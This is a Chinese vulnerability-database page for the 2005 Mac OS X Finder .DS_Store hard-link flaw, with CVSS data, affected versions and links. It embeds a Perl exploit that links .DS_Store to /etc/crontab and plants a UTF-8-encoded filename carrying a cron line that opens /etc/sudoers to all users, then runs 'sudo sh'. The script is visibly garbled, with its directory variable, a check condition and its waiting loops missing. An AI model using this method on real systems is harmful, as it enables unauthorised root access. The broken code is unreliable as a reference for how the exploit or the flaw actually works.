发布时间 :2005-05-02 00:00:00
修订时间 :2017-07-10 21:32:14

[原文]The Finder in Mac OS X and earlier allows local users to overwrite arbitrary files and gain privileges by creating a hard link from the .DS_Store file to an arbitrary file.

[CNNVD]Apple Mac OS X Finder DS_Store不安全文件创建漏洞(CNNVD-200505-737)

        Mac OS X及更早版本中的Finder使得本地用户可以通过创建从 .DS_Store 文件到任意文件的硬链接来重写任意文件并获取权限。

- CVSS (基础分值)

CVSS分值: 2.1 [轻微(LOW)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:apple:mac_os_x_server:10.2.4Apple Mac OS X Server 10.2.4
cpe:/o:apple:mac_os_x:10.2.7Apple Mac OS X 10.2.7
cpe:/o:apple:mac_os_x_server:10.2.5Apple Mac OS X Server 10.2.5
cpe:/o:apple:mac_os_x:10.2.8Apple Mac OS X 10.2.8
cpe:/o:apple:mac_os_x_server:10.2.3Apple Mac OS X Server 10.2.3
cpe:/o:apple:mac_os_x_server:10.2.1Apple Mac OS X Server 10.2.1
cpe:/o:apple:mac_os_x_server:10.2.6Apple Mac OS X Server 10.2.6
cpe:/o:apple:mac_os_x_server:10.2.8Apple Mac OS X Server 10.2.8
cpe:/o:apple:mac_os_x_server:10.2.7Apple Mac OS X Server 10.2.7
cpe:/o:apple:mac_os_x:10.0.4Apple Mac OS X 10.0.4
cpe:/o:apple:mac_os_x:10.2.2Apple Mac OS X 10.2.2
cpe:/o:apple:mac_os_x:10.2.6Apple Mac OS X 10.2.6
cpe:/o:apple:mac_os_x:10.0.1Apple Mac OS X 10.0.1
cpe:/o:apple:mac_os_x:10.0.2Apple Mac OS X 10.0.2
cpe:/o:apple:mac_os_x_server:10.2.2Apple Mac OS X Server 10.2.2
cpe:/o:apple:mac_os_x:10.0.3Apple Mac OS X 10.0.3
cpe:/o:apple:mac_os_x:10.2.1Apple Mac OS X 10.2.1
cpe:/o:apple:mac_os_x:10.2.3Apple Mac OS X 10.2.3
cpe:/o:apple:mac_os_x:10.2.4Apple Mac OS X 10.2.4
cpe:/o:apple:mac_os_x:10.2.5Apple Mac OS X 10.2.5
cpe:/o:apple:mac_os_x_server:10.1.5Apple Mac OS X Server 10.1.5
cpe:/o:apple:mac_os_x_server:10.3.3Apple Mac OS X Server 10.3.3
cpe:/o:apple:mac_os_x:10.3.6Apple Mac OS X 10.3.6
cpe:/o:apple:mac_os_x_server:10.3.4Apple Mac OS X Server 10.3.4
cpe:/o:apple:mac_os_x:10.3.7Apple Mac OS X 10.3.7
cpe:/o:apple:mac_os_x_server:10.1.4Apple Mac OS X Server 10.1.4
cpe:/o:apple:mac_os_x_server:10.3.2Apple Mac OS X Server 10.3.2
cpe:/o:apple:mac_os_x_server:10.1.1Apple Mac OS X Server 10.1.1
cpe:/o:apple:mac_os_x_server:10.1.2Apple Mac OS X Server 10.1.2
cpe:/o:apple:mac_os_x_server:10.3Apple Mac OS X Server 10.3
cpe:/o:apple:mac_os_x_server:10.3.5Apple Mac OS X Server 10.3.5
cpe:/o:apple:mac_os_x_server:10.3.7Apple Mac OS X Server 10.3.7
cpe:/o:apple:mac_os_x_server:10.3.6Apple Mac OS X Server 10.3.6
cpe:/o:apple:mac_os_x:10.2Apple Mac OS X 10.2
cpe:/o:apple:mac_os_x:10.1.3Apple Mac OS X 10.1.3
cpe:/o:apple:mac_os_x:10.3.1Apple Mac OS X 10.3.1
cpe:/o:apple:mac_os_x:10.1Apple Mac OS X 10.1
cpe:/o:apple:mac_os_x:10.0Apple Mac OS X 10.0
cpe:/o:apple:mac_os_x:10.3Apple Mac OS X 10.3
cpe:/o:apple:mac_os_x:10.3.5Apple Mac OS X 10.3.5
cpe:/o:apple:mac_os_x_server:10.1Apple Mac OS X Server 10.1
cpe:/o:apple:mac_os_x_server:10.0Apple Mac OS X Server 10.0
cpe:/o:apple:mac_os_x:10.1.1Apple Mac OS X 10.1.1
cpe:/o:apple:mac_os_x_server:10.1.3Apple Mac OS X Server 10.1.3
cpe:/o:apple:mac_os_x_server:10.3.1Apple Mac OS X Server 10.3.1
cpe:/o:apple:mac_os_x:10.1.2Apple Mac OS X 10.1.2
cpe:/o:apple:mac_os_x:10.1.4Apple Mac OS X 10.1.4
cpe:/o:apple:mac_os_x:10.3.2Apple Mac OS X 10.3.2
cpe:/o:apple:mac_os_x:10.1.5Apple Mac OS X 10.1.5
cpe:/o:apple:mac_os_x:10.3.3Apple Mac OS X 10.3.3
cpe:/o:apple:mac_os_x:10.3.4Apple Mac OS X 10.3.4
cpe:/o:apple:mac_os_x_server:10.2Apple Mac OS X Server 10.2

- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(PATCH)  APPLE  APPLE-SA-2005-05-03
(UNKNOWN)  BUGTRAQ  20050207 [OSX Finder] DS_Store arbitrary file overwrite vulnerability.
(UNKNOWN)  BID  12458
(UNKNOWN)  XF  finder-dsstore-file-overwrite(19253)

- 漏洞信息

Apple Mac OS X Finder DS_Store不安全文件创建漏洞
低危 设计错误
2005-05-02 00:00:00 2005-10-20 00:00:00
        Mac OS X及更早版本中的Finder使得本地用户可以通过创建从 .DS_Store 文件到任意文件的硬链接来重写任意文件并获取权限。

- 公告与补丁


- 漏洞信息 (793)

Mac OS X DS_Store Arbitrary File Overwrite Exploit (EDBID:793)
osX local
2005-02-07 Verified
0 vade79
N/A [点击下载]
# [OSX Finder] DS_Store arbitrary file overwrite exploit. (root version)
# vade79 -> (fakehalo/realhalo)
# this will create a directory called "xfinder" in your home directory,
# once the root user has modified that directory using Finder in almost any
# way(such as copying a file out of it, etc) it will write to the .DS_Store
# file in that directory.  the data written to the .DS_Store file will
# consist of the filenames/subdirectories making up the directory and the
# attributes of the directory.
# this exploit works by linking the .DS_Store file to /etc/crontab, and
# creating a special unicode(utf8 encoded) file in the directory.  the file
# created in unicode is equal to(in ASCII):
#  '\n\n* * * * * root echo "ALL ALL=(ALL) ALL">/etc/sudoers\n\n'
# this file will display as a japanese-like series of characters and
# is (part of) what is written to the .DS_Store file, which allows for 
# the privilege escalation.  once this line has been written to
# /etc/crontab(along with other .DS_Store data), crontab will overwrite
# /etc/sudoers with "ALL ALL=(ALL) ALL" and you can then sudo to root.
# note: this is done through crontab->sudo because sudo will complain
# of the .DS_Store garbage data in the /etc/sudoers file and exit,
# whereas crontab will ignore it.
# (sorry for the squished/ugly script, just a precaution for
# wordwrapping)

use encoding utf8;
sub pexit{print("[!] @_.\n");exit(1);}
print("[OSX Finder] DS_Store arbitrary file overwrite exploit.\n\n");
 pexit("/etc/crontab and /etc/sudoers are required for this to work");
mkdir($testdir)||pexit("Could make the directory \"$testdir\", " .
"make sure it doesn't already exist");
chdir($testdir)||pexit("Could change the directory to \"$testdir\"");
# = "\n\n* * * * * root echo "ALL ALL=(ALL) ALL">/etc/sudoers\n\n"
open(TOUCH,">" . Encode::encode_utf8(
"\x{0a0a}\x{2a20}\x{2a20}\x{2a20}\x{2a20}\x{2a20}\x{726f}\x{6f74}" .
"\x{2065}\x{6368}\x{6f20}\x{2241}\x{4c4c}\x{2041}\x{4c4c}\x{3d28}" .
"\x{414c}\x{4c29}\x{2041}\x{4c4c}\x{223e}\x{2f65}\x{7463}\x{2f73}" .
"\x{7564}\x{6f65}\x{7273}\x{0a0a}"))||pexit("Could not create " .
"unicode/utf8 encoded filename");
link("/etc/crontab",".DS_Store")||pexit("Could not link .DS_Store " .
"to /etc/crontab");
print("[+] Waiting for root user to modify \"$testdir\" with " .
print("[?] (CTRL-C if desired, this script does not need to be " .
"running to work)\n");
print("[+] /etc/crontab has been modified.\n");
print("[+] Waiting for crontab to change /etc/sudoers...\n");
print("[+] /etc/sudoers has been modified.\n");
print("[+] Attempting to \"sudo sh\". (use YOUR password)\n");
system("sudo sh");

# [2005-02-07]

- 漏洞信息

Apple Mac OS X Finder .DS_Store Hard Link Arbitrary File Manipulation
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Mac OS X contains a flaw that may allow a malicious user to arbitrary manipulate files. The issue is triggered due to the insecure creation of '.DS_Store' files. By creating a hard link to point to any file on the system, a malicious user could arbitrary manipulate files resulting in a loss of integrity.

- 时间线

2005-02-07 Unknow
2005-02-07 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Apple has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者